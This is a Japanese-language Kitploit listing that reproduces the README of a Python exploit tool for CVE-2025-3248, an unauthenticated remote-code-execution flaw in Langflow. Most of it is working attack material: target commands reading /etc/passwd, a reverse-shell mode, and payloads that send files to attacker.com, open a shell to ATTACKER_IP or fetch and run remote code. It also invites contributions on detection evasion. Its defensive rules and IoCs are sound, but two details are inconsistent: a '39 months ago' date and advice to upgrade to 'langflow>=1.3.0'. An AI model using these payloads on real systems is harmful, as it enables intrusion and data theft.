Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-3248-exploit — Langflow バージョン ≤ 1.3.0 における重要な未認証リモートコード実行脆弱性 CVE-2025-3248 のテストとデモンストレーションのための包括的な Python エクスプロイトフレームワーク。 | Kitploit
ツール/GitHubGitHub/drackyjr/cve-2025-3248-exploit
脆弱性スキャナーコード分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロール学習と教育レッドチーミングペイロード開発
39ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
drackyjr/cve-2025-3248-exploit

cve-2025-3248-exploit

Langflow バージョン ≤ 1.3.0 における重要な未認証リモートコード実行脆弱性 CVE-2025-3248 のテストとデモンストレーションのための包括的な Python エクスプロイトフレームワーク。

リポジトリを見る

CVE-2025-3248: Langflow 未認証 RCE 脆弱性スキャナ

License Python Status CVSS EPSS

Langflow バージョン ≤1.3.0 における深刻な未認証リモートコード実行脆弱性 CVE-2025-3248 のテストと実証のための、包括的な Python エクスプロイトフレームワークです。


🔴 脆弱性の概要

CVE-2025-3248: Langflow コードインジェクション RCE

プロパティ値
CVE IDCVE-2025-3248
製品Langflow
影響を受けるバージョン≤ 1.3.0
脆弱性の種類未認証のリモートコード実行 (RCE)
攻撃ベクトルネットワーク
必要な認証なし
CVSS スコア9.8 (Critical)
EPSS スコア92.57%
CWECWE-94 (コード生成の不適切な制御)
脆弱なエンドポイント/api/v1/validate/code

根本原因

脆弱性は、/api/v1/validate/code API エンドポイントに存在します。このエンドポイントは任意の Python コードを受け入れ、適切な入力サニタイズやサンドボックス化を行わずに Python の安全でない exec() 関数を使って検証します。この脆弱性は、以下の Python の挙動を悪用します。

  1. デコレーターは関数定義時に即座に評価される
  2. デフォルト引数値は抽象構文木 (AST) 解析時に実行される
  3. 悪意のあるコード実行を防ぐための入力検証が存在しない

攻撃チェーン

root@kitploit:~
攻撃者 → POST /api/v1/validate/code → Python exec() → RCE
     ↓
   認証不要
     ↓
   任意のPythonコード
     ↓
   システムコマンド実行

✨ 機能

  • ✅ エンドポイント検出: 脆弱な Langflow インスタンスを自動的に識別
  • ✅ マルチステージテスト: 4 段階の段階的な脆弱性テスト
  • ✅ コマンド実行: 対象のシステム上で任意のシステムコマンドを実行
  • ✅ 環境変数の抽出: 環境変数と設定情報を取得
  • ✅ ファイル操作: ファイルの読み書き機能をテスト
  • ✅ リバースシェルサポート: 対話型リバースシェルセッションを起動
  • ✅ バージョン検出: Langflow のバージョン情報を特定
  • ✅ カラーコード出力: ターミナル色による可読性向上
  • ✅ タイムアウト管理: 設定可能なリクエストタイムアウト
  • ✅ SSL/TLS バイパス: 自己署名証明書に対応

📦 要件

root@kitploit:~
Python >= 3.7
requests >= 2.25.0

依存関係のインストール

root@kitploit:~
pip install requests

オプション(ログ出力改善用)

root@kitploit:~
pip install colorama  # Windows の色サポート用

🚀 インストール

方法1: GitHub からクローン

root@kitploit:~
git clone https://github.com/drackyjr/cve-2025-3248-exploit.git
cd cve-2025-3248-exploit
pip install -r requirements.txt
chmod +x cve_2025_3248_test.py

📖 使い方

基本構文

root@kitploit:~
python3 cve_2025_3248_test.py -t <target_url> [options]

クイックスタート例

1. 基本的な脆弱性スキャン

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com

2. カスタムコマンドの実行

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "whoami"

3. 複数コマンドの実行

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com -c "cat /etc/passwd"

4. リバースシェルエクスプロイト(許可されたテストのみ)

ステップ1: 自身のマシンで netcat リスナーを起動

root@kitploit:~
nc -lvnp 4444

ステップ2: エクスプロイトを実行

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --exploit --lhost YOUR_IP --lport 4444

例:

root@kitploit:~
python3 cve_2025_3248_test.py -t http://192.168.1.100:7860 --exploit --lhost 192.168.1.50 --lport 4444

5. カスタムタイムアウトでスキャン

root@kitploit:~
python3 cve_2025_3248_test.py -t http://target.com --timeout 30

コマンドライン引数

root@kitploit:~
positional arguments:
  None

optional arguments:
  -t, --target TARGET       ターゲットURL (例: http://target.com) [必須]
  -c, --command COMMAND     実行するコマンド (デフォルト: id)
  --timeout TIMEOUT         リクエストタイムアウト (秒) (デフォルト: 10)
  --exploit                 エクスプロイトモードを有効化 (リバースシェル)
  --lhost LHOST             リバースシェル用の自身のIPアドレス
  --lport LPORT             リバースシェル用の自身のポート
  -h, --help                このヘルプメッセージを表示

💾 ペイロードのバリエーション

1. デコレーターベースの実行

root@kitploit:~
payload = {
    "code": """
@exec("import os; os.system('whoami')")
def vulnerable_function():
    pass
"""
}

2. デフォルト引数の実行

root@kitploit:~
payload = {
    "code": """
def test(arg=exec("__import__('subprocess').check_output(['id'])")):
    pass
"""
}

3. データの外部漏洩

root@kitploit:~
payload = {
    "code": """
def test(x=exec("import requests; requests.post('http://attacker.com/exfil', data=open('/etc/passwd').read())")):
    pass
"""
}

4. リバースシェル(ワンライナー)

root@kitploit:~
payload = {
    "code": """
def shell(x=exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])")):
    pass
"""
}

5. ファイル読み取り操作

root@kitploit:~
payload = {
    "code": """
def read_file(x=exec("print(open('/etc/passwd').read())")):
    pass
"""
}

6. 環境変数の列挙

root@kitploit:~
payload = {
    "code": """
def enum_env(x=exec("import os; print('\\n'.join([f'{k}={v}' for k,v in os.environ.items()]))")):
    pass
"""
}

7. ダウンロードして実行

root@kitploit:~
payload = {
    "code": """
def download_exec(x=exec("import urllib.request; exec(urllib.request.urlopen('http://attacker.com/payload.py').read())")):
    pass
"""
}

🔍 検出と緩和策

防御側向け

即時対応

  1. Langflow のアップグレード

    root@kitploit:~
    pip install langflow>=1.3.0
    # または
    docker pull langflow:latest
    
  2. ネットワークアクセスの制限

    root@kitploit:~
    # Nginx リバースプロキシ - 脆弱なエンドポイントをブロック
    location /api/v1/validate/code {
        deny all;
    }
    
  3. 認証の実装

    root@kitploit:~
    # 認証ミドルウェアを追加
    @app.middleware("http")
    async def auth_middleware(request, call_next):
        if "/api/v1/validate/code" in request.url.path:
            if not verify_auth(request):
                return JSONResponse(status_code=401)
        return await call_next(request)
    

WAF ルール

ModSecurity ルール:

root@kitploit:~
SecRule ARGS:code "@contains exec" "id:1001,phase:2,deny"
SecRule ARGS:code "@contains subprocess" "id:1002,phase:2,deny"
SecRule ARGS:code "@contains __import__" "id:1003,phase:2,deny"
SecRule ARGS:code "@contains os.system" "id:1004,phase:2,deny"

検出ルール

YARA シグネチャ:

root@kitploit:~
rule CVE_2025_3248_Langflow_RCE {
    strings:
        $api_path = "/api/v1/validate/code"
        $exec = "exec("
        $subprocess = "subprocess"
        $os_system = "os.system"
    condition:
        $api_path and any of ($exec, $subprocess, $os_system)
}

監視とロギング

root@kitploit:~
# 不審なリクエストの監視
tail -f /var/log/nginx/access.log | grep "/api/v1/validate/code"

# 脆弱なエンドポイントへの POST リクエストをアラート
auditctl -w /var/lib/langflow -p wa -k langflow_changes

侵害指標 (IoC)

  • /api/v1/validate/code への異常な POST リクエスト
  • Langflow から生成された不審なプロセス
  • Langflow サーバーからの予期しない外部接続
  • /tmp 内の異常なタイムスタンプで作成されたファイル
  • Langflow プロセスからの Python サブプロセスの実行
  • 認証失敗後の API リクエスト
  • Langflow コンテナの CPU/メモリ使用量の急増

🔬 技術的分析

脆弱性の動作原理

脆弱性チェーンは以下のように動作します:

root@kitploit:~
# 攻撃者はこのペイロードを送信:
POST /api/v1/validate/code HTTP/1.1
Content-Type: application/json

{
    "code": "def func(x=exec('import os; os.system(\"whoami\")')): pass"
}

# サーバーは次のように処理:
exec(code)  # ← 危険!サニタイズなし

# AST 解析中にデフォルト引数が評価される:
# exec('import os; os.system("whoami")')

# 結果: 任意のコマンド実行

デコレーターが機能する理由

Python のデコレーターの関数定義時の挙動:

root@kitploit:~
# このコードは即座に実行される:
@decorator_expression
def my_function():
    pass

# つまり、このペイロードはコードを実行する:
@exec("malicious_code_here")
def vulnerable_function():
    pass

脆弱性が深刻な理由

  1. 認証不要: 誰でもエンドポイントにアクセス可能
  2. ネットワーク経由でアクセス可能: リモートから悪用可能
  3. システムへの完全アクセス: Langflow プロセスの権限で実行
  4. 入力検証なし: 直接コード実行
  5. 広く展開: 本番環境で使用されている
  6. エクスプロイトの入手性が高い: 公開 PoC が存在

📊 脆弱性のタイムライン


🛡️ 防御的テストチェックリスト

許可されたセキュリティテストを実施する際:

  • テスト前に書面による許可を得る
  • すべてのテスト活動を文書化する
  • 可能な場合は隔離されたテスト環境を使用する
  • 不必要に本番システムを悪用しない
  • テスト中に作成したアーティファクト(ファイル、プロセス)をクリーンアップする
  • 発見事項を対象組織に責任を持って報告する
  • 責任ある開示の慣行に従う
  • テスト結果の機密性を維持する

📚 参考文献

  • OffSec Blog: CVE-2025-3248 分析
  • SentinelOne: Langflow コードインジェクション RCE
  • Zscaler ThreatLabz: CVE-2025-3248 RCE 脆弱性
  • TrendMicro: FLODRIC ボットネットによる悪用
  • RecordedFuture: 活発な悪用レポート
  • Exploit-DB: Langflow 1.3.0 RCE
  • GitHub Advisories: GHSA-c995-4fw3-j39m


🤝 コントリビューション

コントリビューションを歓迎します!以下のガイドラインに従ってください:

  1. リポジトリをフォークする
  2. 機能ブランチを作成する (git checkout -b feature/amazing-feature)
  3. 変更をコミットする (git commit -m '素晴らしい機能を追加')
  4. ブランチにプッシュする (git push origin feature/amazing-feature)
  5. プルリクエストを開く

コントリビューションのアイデア

  • 追加のペイロードバリエーション
  • 代替のエクスプロイト手法
  • 検出回避方法
  • 緩和戦略
  • ドキュメントの改善
  • バグ修正


⚠️ 免責事項

重要なお知らせ:

このツールは教育目的および許可されたセキュリティテスト目的のみで提供されています。コンピュータシステムへの不正アクセスは違法であり、以下の法律に違反します:

  • Computer Fraud and Abuse Act (CFAA) - 米国
  • Computer Misuse Act - 英国
  • Information Technology Act (ITA) - インド
  • 管轄区域の同様の法律

あなたは以下の責任を単独で負います:

  • ✅ テスト前にシステム所有者から明示的な書面による許可を得ること
  • ✅ すべての活動が現地および国際法に準拠していることを確認すること
  • ✅ このツールを自分が所有するか、テスト許可があるシステムでのみ使用すること
  • ✅ セキュリティ上の発見事項の機密性を維持すること
  • ✅ 責任ある開示の慣行に従うこと
  • ✅ このツールを悪意のある目的に使用しないこと

このツールを使用することにより、あなたは以下に同意するものとします:

  • 不正アクセスや損害のために使用しない
  • 自身の行動に対する完全な法的責任を受け入れる
  • 作成者を一切の責任から免責し、補償する
  • すべての適用法令および規制を遵守する

作成者およびコントリビューターは、このツールの誤用に対していかなる責任も負いません。

📖 追加リソース

学習資料

  • OWASP コードインジェクション
  • CWE-94: コード生成の不適切な制御
  • Python セキュリティ: exec() の危険性
  • リバースシェルテクニック

最終更新日: November 21, 2025


root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║  CVE-2025-3248: Langflow RCE Vulnerability Scanner v1.0  ║
║  責任を持って使用 - 許可されたテストのみ                  ║
╚═══════════════════════════════════════════════════════════╝
ツールをダウンロード
日付イベント
2025-04-06脆弱性が発見され、Langflow チームに報告
2025-04-17公開エクスプロイトが公開 (Exploit-DB)
2025-05-14FortiguardLabs がアウトブレイクアラートを発行
2025-05-21Zscaler ThreatLabz の分析が公開
2025-05-22RecordedFuture が活発な悪用を報告
2025-06-16TrendMicro が FLODRIC ボットネットによる悪用を報告
2025-06-17OffSec が包括的な分析を公開
2025-11-05SentinelOne の脆弱性データベースに登録
2025-11-20継続的な悪用試行が観測